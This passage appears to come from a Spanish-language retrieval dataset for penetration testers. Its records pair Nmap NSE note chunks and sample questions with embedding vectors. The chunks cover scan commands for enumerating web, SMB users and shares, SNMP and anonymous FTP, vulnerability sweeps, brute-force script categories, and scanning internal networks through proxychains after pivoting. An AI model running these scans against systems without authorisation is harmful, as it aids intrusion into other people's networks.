0.00365, -0.06385]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CategorΓ­as de scripts\n```\ndefault (-sC) los seguros y ΓΊtiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticaciΓ³n\nbrute fuerza bruta de credenciales\ndiscovery enumeraciΓ³n (snmp, smb, http...)\n```", "indexar": "con que puedo hacer una fuerza bruta de credenciales?", "v": [-0.01651, 0.00102, -0.1652, 0.08795, 0.01637, 0.14406, 0.10391, 0.09204, -0.0195, -0.21547, -0.04703, 0.1383, -0.0553, 0.09419, -0.01403, -0.03524, -0.07851, -0.04012, -0.10768, -0.06997, 0.02211, -0.24974, 0.03628, -0.09595, -0.0426, -0.04733, -0.04671, 0.17548, -0.03437, -0.00487, 0.01329, 0.14747, 0.10978, -0.0399, 0.06413, 0.08346, -0.14638, 0.08069, 0.11081, 0.11256, -0.11692, 0.10211, -0.0117, -0.01806, 0.00607, 0.042, -0.07565, 0.03391, -0.10023, 0.00379, -0.1269, -0.14362, -0.05757, -0.10919, -0.10065, -0.09673, 0.02881, -0.08015, -0.14208, -0.00048, -0.05335, 0.0705, -8e-05, -0.01234, -0.03365, 0.0332, -0.03496, -0.08224, -2e-05, -0.02169, -0.1749, -0.08722, -0.05636, -0.03308, -0.09343, -0.01511, -0.01818, 0.0057, -0.0307, 0.0007, -0.03021, 0.01597, -0.10101, -0.03784, -0.00666, -0.03253, 0.00708, -0.06781, -0.04394, -0.00827, 0.05538, 0.04173, 0.01526, 0.02502, -0.03587, 0.07575, -0.06178, 0.05904, -0.04069, -0.05719, -0.03686, -0.09291, -0.01748, -0.03022, 0.10301, -0.04345, -0.00681, 0.04842, -0.01295, 0.06671, 0.0194, -0.01049, -0.08801, 0.03484, -0.03702, 0.05049, -0.13224, -0.0966, -0.00989, 0.02614, -0.01164, -0.08065, 0.00446, 0.03577, -0.02939, 0.08371, -0.01588, 0.07089, 0.00474, -0.1077, -0.01155, 0.04873, 0.05303, -0.03292, 0.0738, -0.0615, 0.01553, -0.08019, -0.00792, -0.06316, 0.02185, 0.01829, 0.04313, -0.09164, 0.03798, 0.03094, -0.0568, -0.05916, -0.0228, -0.06924, 0.09797, 0.06355, 0.04303, 0.07175, -0.02122, -0.0046, 0.13408, -0.0704, -0.00504, 0.01363, -0.04391, -0.01996, -0.08197, -0.00545, -0.00815, 0.03266, -0.1021, -0.02039, -0.02414, -0.00112, -0.06496, -0.03365, 0.01899, 0.04645, 0.07611, -0.0295, -0.02762, 0.03759, -0.04605, -0.00999, 0.04171, 0.03565, -0.03559, 0.01394, 0.01211, 0.03206, 0.0196, -0.00781, 0.00321, -0.00325, 0.03082, 0.0466, -0.02029, 0.05857, -0.0096, -0.03034, -0.00052, 0.06327, -0.02553, 0.01414, -0.03068, -0.05859, 0.01973, -0.01871, 0.03872, 0.02295, 0.03418, 0.03429, -0.00272, 0.024, 0.01301, -0.02053, 0.06219, -0.11173, -0.08316, -0.00197, -0.02755, -0.00669, -0.00232, -0.02291, 0.00116, 0.06018, -0.00245, 0.0226, 0.0016, -0.00734, 0.04412, -0.06528, 0.0159, 0.08971, -0.00207, -0.03608, -0.01876, -0.01978, -0.00339, 0.02095, 0.0037, 0.0243, -0.08146, 0.0136, -0.01589, 0.0393, -0.00417, -0.04466, -0.06759, 0.01264, -0.03982, -0.0027, -0.02278, -0.01885, -0.00095, 0.03021, 0.10169, -0.01629, 0.03086, -0.03239]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CategorΓ­as de scripts\n```\ndefault (-sC) los seguros y ΓΊtiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticaciΓ³n\nbrute fuerza bruta de credenciales\ndiscovery enumeraciΓ³n (snmp, smb, http...)\n```", "indexar": "cual es un script para realizar enumeraciΓ³n de servicios como SNMP o SMB?", "v": [-0.12114, -0.09544, -0.0906, -0.0713, -0.11007, -0.25851, -0.27588, -0.16874, -0.17416, 0.04053, -0.19661, 0.02855, 0.22674, -0.26722, -0.07943, 0.17729, -0.04801, -0.21494, 0.0482, 0.16981, -0.01668, 0.02045, 0.07417, 0.02032, -0.08406, 0.00977, 0.04244, 0.06093, -0.08429, 0.04595, 0.01849, -0.00465, 0.00294, -0.07725, 0.03601, -0.00898, 0.05623, 0.06382, 0.03393, 0.09999, 0.00345, -0.10218, -0.03743, -0.01491, -0.04193, -0.00627, 0.04904, 0.02649, -0.00608, -0.01895, -0.01897, 0.11179, -0.12247, -0.03746, -0.12441, 0.06239, 0.00488, -0.13375, -0.06258, 0.02984, 0.0211, -0.01165, -0.01017, -0.05354, 0.07016, -0.07474, -0.02545, -0.03715, 0.00457, -0.01556, -0.02576, -0.00674, 0.02808, -0.01759, -0.02779, 0.02347, -0.05889, -0.04247, 0.06093, 0.03571, 0.01486, -0.03668, -0.11888, 0.03859, -0.01987, -0.03903, 0.00548, 0.02431, -0.03168, -0.013, 0.05543, 0.10262, 0.00821, 0.08667, -0.04345, -0.06501, 0.02156, -0.03782, 0.08492, -0.0133, 0.08011, 0.02219, -0.10017, 0.09801, -0.04155, 0.0194, 0.09921, 0.06426, -0.01643, -0.04405, -0.01834, 0.01072, -0.02545, 0.04946, -0.05112, -0.10947, -0.07193, -0.02766, 0.05507, -0.03946, 0.01657, 0.03477, -0.07577, -0.01124, -0.02159, -0.0123, 0.06001, -0.04299, 0.02255, 0.00789, -0.02784, -0.00771, -0.05553, -0.07861, -0.01407, -0.0359, 0.06236, 0.00882, 0.02396, -0.02695, 0.02992, -0.05806, -0.00318, 0.01867, -0.00035, -0.06377, -0.02143, -0.05662, 0.00667, 0.01036, 0.04177, 0.03359, -0.06876, 0.03916, 0.0543, -0.03649, 0.00671, -0.02191, -0.07524, 0.04711, -0.05147, -0.02731, 0.08323, 0.04318, 0.04719, -0.00519, 0.00665, 0.02824, 0.00601, -0.04597, -0.04204, 0.00959, 0.00977, -0.05675, 0.03756, -0.04354, -0.01649, -0.00892, 0.03807, 0.00068, 0.00448, -0.0298, 0.01702, 0.04711, -0.01036, -0.02845, 0.03936, -0.06874, -0.02104, -0.04944, -0.00295, -0.00165, -0.00627, -0.01233, 0.00757, -0.01863, -0.01374, 0.00545, -0.01614, -0.02633, -0.04855, 0.02432, -0.10128, -0.02396, -0.00207, -0.00074, 0.0136, 0.0268, -0.00079, 0.00344, 0.01175, -0.0024, 0.04536, -0.0207, 0.01942, -0.02676, 0.01122, 0.06059, 0.04395, 0.01829, 0.00236, -0.0366, -0.00029, -0.02476, -0.07962, -0.04194, 0.01277, 0.0359, -0.0083, -0.00784, -0.00214, -0.01319, 0.00382, -0.00643, 0.04915, 0.00657, -0.03163, -0.03841, 0.02544, -0.02068, -0.01509, -0.01627, -0.049, -0.01688, -0.00447, 0.05371, -0.04342, -0.01924, -0.01967, -0.02285, 0.04591, -0.02154, 0.01474, 0.03273, 0.00264, -0.00554]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web β†’ EnumeraciΓ³n web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anΓ³nimo\nnmap --script vuln IP # barrido de vulns\n```", "indexar": "quΓ© herramienta sirve para hacer un barrido de vulnerabilidades en una red?", "v": [-0.01567, 0.04942, -0.18767, -0.12978, -0.03016, -0.01521, -0.03667, -0.11832, 0.04657, -0.17904, -0.07443, -0.13441, -0.03361, -0.08569, 0.06189, 0.1057, -0.00154, -0.05933, 0.05113, -0.00807, 0.00649, -0.03638, -0.05161, 0.06957, -0.0368, -0.00835, 0.0266, -0.08755, -0.19713, 0.16465, -0.03752, 0.02085, 0.05026, -0.0355, -0.15925, 0.02861, 0.00325, 0.06518, -0.0564, 0.0412, -0.01582, -0.02642, -0.06542, 0.0157, 0.03867, 0.01162, -0.02381, -0.0683, 0.04861, 0.14114, -0.04091, -0.1842, -0.18114, -0.05282, -0.00231, -0.1406, 0.16311, -0.10894, -0.00964, -0.08831, -0.08354, -0.04794, 0.03284, 0.02295, 0.01884, -0.09728, -0.05338, 0.0387, -0.02547, 0.16314, -0.02587, -0.03027, -0.03433, 0.00626, -0.03177, 0.04875, -0.01271, -0.01727, -0.01859, -0.02344, 0.02891, 0.06762, -0.00655, 0.02226, -0.08286, -0.11733, 0.10312, -0.02803, 0.02887, -0.06551, 0.09532, 0.10075, 0.00213, -0.03648, 0.01126, -0.01922, 0.11002, 0.00308, -0.02118, -0.05718, 0.06824, -0.09843, -0.11702, -0.01124, 0.0953, 0.07765, -0.08504, 0.00546, -0.0001, -0.06928, 0.03894, -0.03904, -0.01879, -0.00561, -0.05176, 0.0756, 0.00743, -0.00794, -0.02303, -0.03906, -0.01462, -0.04795, -0.11267, -0.06993, -0.03327, -0.03647, -0.04136, 0.03623, -0.04015, -0.03976, -0.03456, -0.07008, -0.08083, -0.00558, -0.05906, -0.0202, 0.07398, -0.15792, -0.06501, -0.0295, 0.06807, 0.02617, -0.02326, -0.0805, -0.04043, 0.08224, 0.06455, -0.05165, -0.03518, 0.05128, 0.00917, -0.02299, -0.05609, -0.00183, -0.04926, 0.01273, -0.00282, -0.0625, -0.08158, 0.09097, -0.00911, -0.0532, 0.02315, 0.05546, -0.004, -0.04754, 0.07827, 0.01473, 0.1016, 0.05085, -0.00396, 0.05048, 0.0483, -0.0191, -0.00328, -0.12744, -0.0186, -0.05448, -0.02305, -0.09306, -0.03894, -0.01471, -0.02538, 0.01949, 0.02673, -0.05291, 0.02414, -0.07349, 0.04808, 0.01373, -0.05637, -0.02419, 0.02412, -0.01864, 0.03796, 0.01721, -0.0186, -0.06711, -0.02069, -0.01324, -0.06528, -0.0149, -0.02436, 0.00453, 0.0803, 0.07557, -0.01201, 0.00154, -0.00052, 0.11912, 0.02393, 0.04842, 0.04759, -0.02814, -0.05015, -0.04039, 0.01031, 0.06148, 0.00998, -0.07384, 0.05686, -0.03706, -0.00424, 0.0659, 0.02011, 0.02454, -0.0042, -0.05517, 0.01196, 0.04887, 0.03584, -0.04381, -0.0265, -0.00489, 0.03503, -0.05427, 0.04809, 0.01405, -0.0256, -0.0707, 0.0163, -0.00287, -0.01468, -0.03672, 0.02194, -0.06572, -0.01105, 0.00474, -0.00965, -0.09104, -0.03036, 0.05381, 0.06031, -0.0408, 0.00369, -0.03238]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web β†’ EnumeraciΓ³n web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anΓ³nimo\nnmap --script vuln IP # barrido de vulns\n```", "indexar": "con quΓ© puedo encontrar usuarios y carpetas compartidos en el protocolo SMB?", "v": [0.14987, 0.02075, -0.17167, -0.15457, -0.07529, -0.20345, 0.13608, -0.07017, -0.11412, -0.05107, -0.06031, 0.07902, 0.05329, -0.118, -0.02156, 0.03832, 0.02599, 0.02993, 0.08377, -0.05062, 0.05603, -0.0338, -0.02885, -0.01029, -0.00838, 0.04551, 0.13423, 0.00334, -0.02694, 0.02318, 0.06156, -0.01526, 0.00416, 0.031, -0.02458, -0.02649, -0.0249, 0.02824, -0.07911, 0.00707, 0.06337, 0.05063, -0.15053, -0.06407, 0.0752, -0.03588, -0.13699, -0.05351, -0.05865, -0.07583, -0.12331, -0.04295, -0.11417, -0.02986, -0.10854, -0.0452, 0.14885, -0.0747, 0.02176, 0.05332, -0.06641, -0.04393, 0.06473, 0.11052, 0.00676, -0.15546, 0.06864, 0.08597, -0.11316, 0.11138, -0.02374, 0.09143, 0.01386, -0.08051, 0.08139, 0.08378, -0.08775, -0.1053, 0.03584, 0.03886, 0.03984, 0.00387, 0.03466, -0.02412, 0.01821, -0.06626, -0.00869, -0.00804, -0.03401, -0.08152, 0.04397, -0.00828, -0.06898, -0.01788, 0.05032, -0.04533, 0.03259, 0.02963, 0.04548, 0.04797, -0.00023, 0.06359, -0.09148, 0.09414, -0.05181, 0.06238, -0.06863, -0.05767, 0.0593, -0.11196, 0.03795, 0.06909, 0.04748, 0.0307, -0.09605, -0.03939, -0.04183, -0.01541, -0.0251, 0.03953, -0.04498, 0.01512, 0.00152, 0.00576, 0.06492, -0.05754, 0.05927, 0.17467, 0.0043, 0.03238, -0.12748, 0.05759, -0.03632, -0.02688, -0.06229, 0.0111, -0.09004, -0.01817, -0.01709, 0.00518, -0.01046, 0.03302, -0.03306, -0.01692, -0.01309, -0.02338, 0.0527, -0.08571, -0.09951, -0.01534, 0.02896, 0.09, -0.09645, -0.05795, -0.05321, 0.03722, 0.04734, -0.06913, -0.09765, -0.04534, -0.06629, -0.00973, 0.01499, 0.04286, 0.07676, 0.02372, -0.02586, -0.05937, 0.04309, 0.0488, 0.0012, 0.0398, -0.02965, -0.02575, -0.05915, 0.01199, -0.02333, -0.08743, 0.00958, 0.00243, -0.05477, -0.01597, -0.02687, 0.02198, 0.00428, -0.055, 0.00165, 0.06626, 0.02014, -0.01513, 0.01997, 0.07503, 0.06597, 0.091, -0.08163, -0.0968, 0.02234, 0.01133, -0.02891, -0.02817, -0.08211, 0.06344, -0.02751, -0.04804, 0.05629, -0.01768, -0.07492, 0.01729, 0.00723, 0.03904, -0.00877, -0.03805, 0.01807, -0.06037, -0.06, -0.01941, 0.0084, 0.00303, 0.06476, -0.11761, 0.06831, 0.02057, 0.03909, -0.05162, 0.03729, -0.02818, -0.06597, 0.02933, 0.0572, -0.02497, 0.01569, 0.03158, 0.03268, 0.01513, 0.07708, 0.04971, -0.06462, -0.05635, -0.01982, 0.00136, -0.09411, 0.02549, -0.07663, -0.04889, -0.00539, -0.0264, -0.08093, 0.00455, -0.02987, -0.03533, -0.01593, -0.06347, 0.07801, -0.03381, -0.01853, -0.02943]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web β†’ EnumeraciΓ³n web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anΓ³nimo\nnmap --script vuln IP # barrido de vulns\n```", "indexar": "ΒΏhay alguna forma fΓ‘cil de detectar servicios web, SNMP o FTP anΓ³nimos en mi objetivo?", "v": [-0.02419, 0.11946, -0.09252, -0.15006, -0.04312, -0.0825, -0.18318, -0.07401, -0.12899, 0.14482, -0.05556, 0.04398, 0.0831, -0.07782, 0.04845, 0.08514, 0.04501, -0.19334, 0.15115, -0.0642, -0.15002, -0.02656, -0.04827, -0.10058, -0.03838, -0.04953, 0.05913, -0.0102, -0.056, -0.04561, 0.19287, -0.04049, -0.03003, 0.13195, -0.07559, 0.01636, 0.06599, 0.05279, 0.08838, -0.00205, 0.06711, -0.06551, -0.01763, 0.09596, 0.08499, -0.01119, -0.04105, -0.11736, 0.14449, 0.05384, 0.08792, -0.05037, -0.17612, -0.02446, -0.13949, 0.00798, 0.079, -0.09201, 0.06833, 0.01778, -0.04756, 0.0498, -0.02289, -0.06251, 0.04594, -0.11464, 0.00811, -0.04586, -0.08241, 0.05693, -0.02777, -0.04131, 0.06269, 0.04492, 0.10672, 0.02967, -0.06381, -0.06075, 0.14599, -0.03549, 0.09068, -0.04184, -0.11829, 0.02945, -0.13424, -0.00774, 0.0055, 0.04639, -0.05379, -0.08156, 0.07986, 0.13113, -0.03215, 0.00315, -0.03536, -0.04503, 0.06432, -0.02775, 0.00341, -0.02205, 0.01545, 0.00488, -0.04686, 0.0944, 0.01003, -0.07142, -0.01571, 0.03038, 0.00331, -0.05438, 0.04188, 0.05033, 0.01442, -0.04329, -0.01192, -0.07917, 0.00793, -0.0188, 0.01019, -0.04152, -0.09278, -0.02899, -0.08141, -0.00669, -0.03806, -0.05039, 0.00316, -0.0113, 0.0512, 0.03561, 0.02295, -0.02341, -0.14718, -0.08221, -0.00355, 0.09919, 0.03702, -0.06898, 0.00345, 0.04839, -0.05458, -0.00289, -0.08792, 0.03263, 0.04294, -0.07549, -0.02662, -0.0853, -0.00861, -0.02803, -0.00031, -0.04659, -0.02272, -0.06444, 0.00209, -0.00734, 0.01824, -0.12162, -0.04605, 0.00388, -0.0966, 0.06067, 0.10213, -0.02666, 0.03994, 0.00261, 0.0108, -0.01319, 0.02914, -0.04485, -0.04281, 0.05208, -0.00246, -0.09949, 0.08585, 0.00629, -0.03783, -0.0358, 0.03724, -0.00605, 0.05187, -0.00188, 0.01578, 0.04307, -0.0018, 0.00012, 0.03879, -0.01644, 0.00501, -0.09961, 0.09863, -0.06542, -0.02767, -0.00834, 0.05379, -0.00924, 0.00157, -0.00949, -0.0229, -0.04493, -0.06736, -0.07527, 0.00389, 0.01925, -0.0246, -0.02998, 0.03644, 0.03597, -0.00697, 0.00181, 0.04541, 0.005, 0.08045, -0.0776, -0.00509, -0.02437, 0.03324, 0.01507, 0.03424, 0.04558, -0.05207, 0.012, 0.04261, -0.00695, 0.01818, -0.05735, 0.01958, 0.02172, 0.0262, -0.02651, -0.02379, -0.0129, 0.01147, -0.01243, 0.03881, -0.08628, 0.0373, -0.01165, 0.00238, 0.00581, 0.01132, -0.01484, -0.01697, 0.03166, -0.0097, -0.01699, -0.0376, 0.00784, -0.06585, -0.01515, -0.01652, -0.04083, -0.02187, -0.02821, -0.02773, 0.07812]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Gestionar scripts\n```bash\nnmap --script-help http-enum # quΓ© hace un script\nls /usr/share/nmap/scripts | grep smb # listar los disponibles\n```", "indexar": "quΓ© programa me sirve para ver la lista de scripts disponibles y sus funciones?", "v": [0.03087, 0.12652, -0.14777, -0.1366, 0.0342, -0.21633, -0.04765, -0.10084, 0.04144, -0.08386, -0.0612, -0.10813, 0.03276, -0.1402, 0.03138, 0.03112, 0.0473, -0.17874, 0.08227, 0.06868, -0.00969, 0.01852, -0.02238, -0.05876, -0.1329, 0.04531, 0.11417, -0.05898, -0.0896, -0.00414, 0.10111, -0.01427, 0.04713, -0.14648, 0.04767, 0.06667, 0.03116, 0.00554, 0.03319, 0.16721, 0.0191, 0.00015, -0.03041, 0.06795, -0.02445, -0.05778, 0.07658, 0.00811, 0.02696, -0.01886, 0.00134, -0.02637, -0.01483, 0.09572, 0.0328, -0.07365, -0.07571, -0.18756, -0.09497, 0.05127, -0.05478, -0.00034, -0.00248, -0.07717, 0.04951, -0.0025, 0.07038, -0.07757, -0.0171, 0.0099, -0.08471, 0.02821, -0.04045, -0.01291, -0.0054, 0.05086, -0.10375, -0.07935, -0.04071, -0.01098, -0.0319, 0.018, -0.06064, 0.08467, -0.02154, -0.09161, -0.01877, -0.01498, -0.07698, -0.04756, 0.11912, 0.10842, -0.04017, 0.08292, 0.0593, -0.00383, 0.07101, 0.07312, 0.11145, 0.02391, 0.04445, -0.09736, -0.03903, 0.16125, -0.03686, 0.10498, 0.11632, -0.00765, -0.066, -0.00148, 0.03024, 0.02224, -0.07331, 0.00811, -0.03217, 0.01797, -0.02723, 0.00449, 0.04534, -0.03777, -0.11769, 0.05814, -0.04816, 0.00367, 0.10358, 0.00657, 0.02005, 0.07325, -0.01415, 0.06241, -0.07733, 0.02677, -0.0989, -0.12611, -0.06712, -0.03698, 0.10015, 0.03109, -0.03624, -0.04469, 0.08252, 0.06566, 0.0853, 0.04294, 0.01693, -0.05676, 0.065, -0.05377, 0.01955, -0.01557, 0.02526, 0.02571, -0.00999, 0.0698, -0.00626, -0.07421, 0.03123, -0.01583, -0.06729, -0.01242, -0.02203, -0.05868, -0.05603, 0.00862, 0.07245, -0.02577, -0.02903, 0.01546, 0.09591, 0.13877, 0.00183, 0.07776, 0.07115, -0.1233, -0.06891, -0.05373, 0.01161, -0.04104, 0.01252, -0.01899, -0.04873, 0.02412, 0.04639, 0.03249, 0.00096, -0.0775, -0.07182, -0.0439, 0.01644, -0.00108, -0.03028, 0.0417, -0.05182, -0.02511, 0.00293, 0.00354, -0.06625, -0.01897, 0.00483, -0.09966, -0.05352, 0.00943, 0.01609, -0.00684, 0.05543, 0.10335, -0.00944, 0.02177, 0.00678, 0.05312, 0.00027, 0.01563, 0.04952, 0.04916, -0.02754, -0.0654, 0.03535, 0.01322, 0.07006, -0.01101, 0.00675, -0.03853, 0.01929, -0.01024, 0.02029, -0.04063, 0.07834, -0.01291, 0.03605, 0.02876, -0.00111, -0.0293, -0.01486, -0.05073, 0.00756, -0.05633, -0.03833, -0.00921, -0.00573, -0.09436, -0.04209, 0.08771, 0.00788, -0.07283, -0.01477, -0.00858, -0.02348, -0.00164, 0.01807, -0.0137, -0.07692, 0.02779, 0.04241, -0.04461, 0.04824, 0.01169]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Gestionar scripts\n```bash\nnmap --script-help http-enum # quΓ© hace un script\nls /usr/share/nmap/scripts | grep smb # listar los disponibles\n```", "indexar": "cual es una herramienta para ejecutar o probar diferentes scripts sin saber su contenido?", "v": [-0.00017, 0.05056, -0.15532, -0.14503, 0.07288, -0.22248, -0.09595, -0.06679, 0.04405, -0.10907, -0.10281, -0.01433, 0.01485, -0.14472, -0.02375, 0.06773, 0.10969, -0.1679, 0.00679, 0.01508, 0.07903, -0.01139, -0.08309, -0.05888, -0.1367, -0.03152, 0.05426, 0.0872, -0.16621, 0.01211, -0.08793, 0.07275, 0.15901, -0.08546, -0.11209, 0.02327, 0.02096, -0.01134, -0.0008, 0.17427, -0.02352, 0.05273, -0.05685, 0.11072, -0.05793, -0.00722, -0.00211, 0.02247, 0.01405, -0.02452, 0.07056, -0.04536, -0.12566, -0.02724, -0.05068, -0.08973, 0.15189, -0.20146, 0.02728, -0.02703, -0.02667, -0.06916, 0.01125, -0.04681, 0.03669, -0.01526, 0.01588, -0.06208, -0.06511, 0.09251, -0.02878, 0.03638, -0.05033, 0.05164, 0.00932, -0.02785, -0.02748, -0.03845, 0.01518, 0.02172, -0.004, -0.04107, -0.0493, 0.05964, -0.04551, -0.17611, -0.07647, -0.07954, -0.03158, -0.06474, 0.09041, 0.05157, 0.00051, 0.07281, 0.02613, -0.0428, 0.15282, -0.1011, 0.00222, 0.00648, 0.05899, -0.1002, -0.09904, 0.09711, -0.03095, 0.06516, -0.02572, 0.02916, -0.01996, -0.00573, 0.02485, 0.05212, -0.04389, 0.04178, -0.02505, 0.02457, -0.05706, -0.05756, 0.02598, -0.10419, -0.0409, 0.10513, -0.13701, -0.04816, 0.05782, -0.02903, 0.00678, 0.02181, -0.00235, -0.03095, -0.03578, -0.02712, -0.06958, -0.04817, -0.04568, 0.04366, 0.10519, -0.07179, -0.0604, -0.1083, 0.04598, -0.00708, 0.0388, 0.01734, 0.058, -0.0159, -0.01003, -0.04667, -0.05152, 0.05217, 0.00869, -0.05253, -0.02413, 0.03043, -0.03944, -0.10118, -0.00322, -0.00118, -0.07967, 0.05003, -0.02348, -0.05129, -0.026, -0.00052, 0.06965, -0.05247, -0.05189, 0.02241, 0.03929, 0.06654, 0.03936, 0.05909, 0.0714, -0.0313, 0.00126, -0.10014, -0.07655, -0.04604, -0.05006, -0.0742, 0.00055, 0.00128, -0.00209, -0.00038, 0.00026, -0.06189, 0.00338, -0.00828, -0.03528, 0.06083, -0.00023, 0.04707, -0.02162, -0.09385, 0.05235, 0.02697, 0.02105, -0.09004, -0.00263, 0.00746, -0.04401, 0.01343, 0.01337, -0.05279, 0.02695, 0.03135, -0.02949, -0.00991, -0.05571, -0.01415, 0.06719, 0.04325, 0.03214, -0.01155, -0.02458, -0.02095, -0.01044, 0.05492, -0.00464, 0.01349, 0.01209, -0.01661, 0.07164, -0.07043, -0.03276, 0.01535, 0.03276, 0.02449, -0.03416, -0.01604, 0.0327, -0.00817, -0.02769, 0.01962, 0.03513, -0.03416, 0.00799, -0.02814, -0.04027, -0.0901, -0.01465, 0.06578, 0.01059, -0.04721, -0.03172, -0.01989, -0.04261, -0.03968, -0.051, -0.0483, -0.00191, 0.0203, 0.0696, -0.02973, 0.01525, -0.01292]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## A travΓ©s de un tΓΊnel\n`proxychains nmap ...` (de tu history) para escanear la red interna tras Pivoting ligolo-ng (usa `-sT -Pn`, SYN no pasa por proxychains).\n\nRelacionado: searchsploit Β· Puertos olvidados Β· OSCP MOC", "indexar": "ΒΏhay alguna forma de escanear la red interna usando un tΓΊnel de proxy?", "v": [-0.02921, -0.03938, -0.15997, -0.00328, 0.10783, 0.01198, -0.09711, -0.05838, 0.10696, 0.05092, -0.20171, 0.02359, 0.06313, 0.02621, -0.08011, 0.03714, -0.03593, -0.00123, 0.21224, 0.01599, -0.15702, -0.07168, -0.11908, 0.04454, 0.06398, 0.02286, -0.02348, -0.0957, -0.05897, -0.20669, 0.01624, 0.03, 0.15053, 0.01902, -0.09165, 0.02469, 0.05391, 0.10345, 0.03827, 0.08472, -0.05239, -0.13073, -0.16221, 0.02255, 0.07757, -0.0117, -0.10793, -0.06942, -0.02218, -0.06361, -0.05335, -0.12541, -0.20227, 0.02251, 0.03678, -0.08765, -0.00631, -0.07269, -0.00442, -0.07281, 0.03522, -0.05751, 0.04204, 0.08123, 0.02394, -0.0573, -0.02303, 0.01404, -0.079, 0.00913, -0.09621, -0.0023, -0.03407, 0.05978, 0.03688, 0.02703, -0.07617, 0.00477, 0.07722, 0.12796, 0.00466, 0.05954, -0.04384, -0.01337, -0.05004, 0.00996, -0.05391, -0.02733, 0.06346, -0.04912, -0.05614, 0.01026, 0.05633, 0.11031, 0.08486, -0.02367, -0.01295, 0.02924, -0.00028, -0.06523, 0.05838, -0.02073, -0.06461, 0.12717, 0.01449, 0.11246, -0.01805, -0.13697, 0.0591, 0.05909, 0.05168, 0.1141, 0.01085, -0.08427, -0.01385, -0.05703, 0.02131, 0.07457, -0.02357, -0.0824, -0.01503, -0.05262, -0.09657, -0.01846, -0.02871, -0.10025, -0.05799, 0.03732, 0.03372, 0.08315, -0.0746, 0.00229, -0.0064, -0.10171, -0.04663, 0.02978, 0.00409, -0.06639, 0.03643, -0.04653, 0.01659, -0.03239, -0.06158, -0.06693, -0.00794, 0.1003, -0.01231, -0.11677, -0.0159, -0.02709, -0.03812, -0.04407, -0.03609, -0.00188, -0.00284, 0.00392, 0.0359, -0.04669, -0.02386, 0.0915, -0.0131, 0.02623, -0.02753, -0.01778, -0.05256, -0.06895, -0.03866, -0.06585, 0.02152, -0.02757, -0.00549, 0.04807, -0.06427, -0.04925, 0.02348, -0.04693, -0.04672, -0.10945, 0.038, -0.02471, 0.08427, -0.05845, -0.03005, 0.06141, 0.0103, -0.08113, 0.03352, -0.03837, 0.01454, 0.03694, 0.00441, -0.0226, 0.00062, -0.01452, -0.01094, -0.00632, 0.01739, -0.04396, 0.06477, -0.07412, -0.06504, -0.00757, 0.06792, -0.03922, 0.00248, -0.04383, -0.02253, -0.04094, 0.05641, 0.12932, 0.0963, -0.04089, 0.00215, 0.00836, 0.00773, 0.04066, 0.08522, 0.0183, -0.04564, -0.02081, 0.02903, 0.023, 0.02878, 0.02252, -0.02592, 0.0275, 0.00739, -0.02216, -0.0695, 0.03222, 0.02195, 0.0196, -0.05909, -0.02842, 0.02498, -0.00506, 0.03602, 0.0352, 0.02383, -0.05797, 0.04777, 0.04932, -0.00992, 0.05617, -0.02693, 0.01488, -0.01838, 0.04094, 0.01302, -0.02136, -0.00076, 0.00531, -0.04688, -0.0403, 0.0551, -0.002]} -{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## A travΓ©s de un tΓΊnel\n`proxychains nmap ...` (de tu history) para escanear la red interna tras Pivoting ligolo-ng (usa `-sT -Pn`, SYN no pasa por proxychains).\n\nRelacionado: searchsploit Β· Puertos olvidados Β· OSCP MOC", "indexar": "ΒΏquΓ© tΓ©cnica sirve para hacer pivoteo en una red local oculta por un proxy?", "v": [-0.03745, -0.05606, -0.26033, -0.08485, 0.16179, -0.14243, 0.02324, -0.07538, 0.05476, -0.10423, 0.02308, -0.06276, 0.11496, -0.06693, 0.03853, -0.12057, 0.04154, 0.00329, 0.14322, -0.01086, -0.10949, 0.02165, -0.11232, 